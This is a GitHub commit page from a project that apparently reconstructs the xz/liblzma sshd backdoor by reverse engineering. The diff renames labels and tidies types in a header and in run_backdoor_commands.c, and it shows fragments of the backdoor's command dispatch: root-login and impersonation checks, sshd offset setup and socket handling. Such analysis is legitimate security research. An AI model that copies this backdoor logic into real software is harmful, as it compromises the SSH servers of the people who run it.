Skip to content

Commit

Permalink
minor changes
Browse files Browse the repository at this point in the history
  • Loading branch information
@smx-smx
smx-smx committed May 1, 2024
1 parent db38f8b commit f6d2b65
Show file tree
Hide file tree
Showing 2 changed files with 6 additions and 8 deletions.
2 changes: 1 addition & 1 deletion xzre.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1942,7 +1942,7 @@ typedef union __attribute__((packed)) payload {
*/
typedef struct __attribute__((packed)) run_backdoor_commands_data {
u64 body_size;
u32 *p_do_orig;
BOOL *p_do_orig;
u64 payload_size;
u64 hostkey_hash_offset;
RSA *rsa;
Expand Down
12 changes: 5 additions & 7 deletions xzre_code/run_backdoor_commands.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -250,12 +250,12 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
if(cmd_type == 1){
if(!TEST_FLAG(f.kctx.args.flags2, CMDF_IMPERSONATE)
&& !ctx->sshd_ctx->permit_root_login_ptr) break;
goto j_monitor_req;
goto j_payload_main;
}
if(cmd_type != 3){
j_monitor_req:
j_payload_main:
offsets.value = 0;
goto payload_exec;
goto payload_main;
}
if((f.kctx.args.u.value[0] & 0x80) == 0
&& !ctx->sshd_ctx->permit_root_login_ptr) break;
Expand All @@ -264,7 +264,7 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){

if(!TEST_FLAG(f.kctx.args.flags3, 0x20)){
offsets.value = -1;
goto payload_exec;
goto payload_main;
}

u8 value;
Expand Down Expand Up @@ -315,7 +315,7 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
have_offsets:
offsets.value = (tmp.value << 24) | v;

payload_exec:
payload_main:
ctx->sshd_offsets = offsets;

data_ptr2 = (u8 *)&f.kctx.payload + body_offset;
Expand Down Expand Up @@ -464,8 +464,6 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
if(!ctx->libc_imports->pselect) break;
if(!ctx->libc_imports->__errno_location) break;

int write_idx = f.u.sock.socket_fd / 64;

int res;
for(;;){
*(u64 *)&f.u.sock.fd_recv_buf[16] = __builtin_bswap32(0x50);
Expand Down

0 comments on commit f6d2b65

Please sign in to comment.